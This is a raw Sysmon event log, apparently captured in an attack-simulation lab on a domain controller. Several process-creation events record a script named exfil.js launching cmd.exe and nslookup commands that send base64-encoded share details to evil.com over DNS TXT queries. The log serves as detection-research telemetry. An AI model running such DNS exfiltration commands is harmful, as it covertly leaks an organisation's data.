14:16:13.380{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.380{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.380{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.380{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-7E3E-000000005F02}7852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.380{2E1864BB-17A1-629A-783D-000000005F02}55526712C:\Windows\System32\WScript.exe{2E1864BB-17AD-629A-7E3E-000000005F02}7852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.386{2E1864BB-17AD-629A-7E3E-000000005F02}7852C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgzjhx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.380{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlefmajr.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.333{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34AED6E9567F11B1E8BCD36C99485B45,SHA256=A44B3FD3E06B4E3A2F3DA78F5B9904EE400D7C0AE74807DAF9C125C9F650A04B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.317{2E1864BB-17AD-629A-7C3E-000000005F02}51927436C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-7D3E-000000005F02}7960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.317{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-7D3E-000000005F02}7960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.316{2E1864BB-17AD-629A-7B3E-000000005F02}61767036C:\Windows\system32\cmd.exe{2E1864BB-17AD-629A-7D3E-000000005F02}7960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.316{2E1864BB-17AD-629A-7D3E-000000005F02}7960C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AD-629A-7B3E-000000005F02}6176C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlefmajr.tmp 2>&1 354300x8000000000000000195906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52269- 354300x8000000000000000195905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52268- 354300x8000000000000000195904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52267- 354300x8000000000000000195903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.494{00000000-0000-0000-0000-000000000000}7300<unknown process>-udptruefalse127.0.0.1-52267-false127.0.0.1-53domain 354300x8000000000000000195902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.356{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52266- 354300x8000000000000000195901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.356{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52265- 354300x8000000000000000195900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.355{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52264- 354300x8000000000000000195899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.355{00000000-0000-0000-0000-000000000000}2104<unknown process>-udptruefalse127.0.0.1-52264-false127.0.0.1-53domain 354300x8000000000000000195898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.181{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52263- 354300x8000000000000000195897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.181{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52262- 354300x8000000000000000195896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52261- 354300x8000000000000000195895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.180{00000000-0000-0000-0000-000000000000}5064<unknown process>-udptruefalse127.0.0.1-52261-false127.0.0.1-53domain 10341000x8000000000000000195894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.264{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-7C3E-000000005F02}5192C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.264{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-7C3E-000000005F02}5192C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.248{2E1864BB-17AD-629A-7C3E-000000005F02}51927436C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-7B3E-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.233{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-7C3E-000000005F02}5192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.217{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.217{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.217{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.217{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.217{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-7B3E-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.217{2E1864BB-17A1-629A-783D-000000005F02}55523620C:\Windows\System32\WScript.exe{2E1864BB-17AD-629A-7B3E-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.227{2E1864BB-17AD-629A-7B3E-000000005F02}6176C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlefmajr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 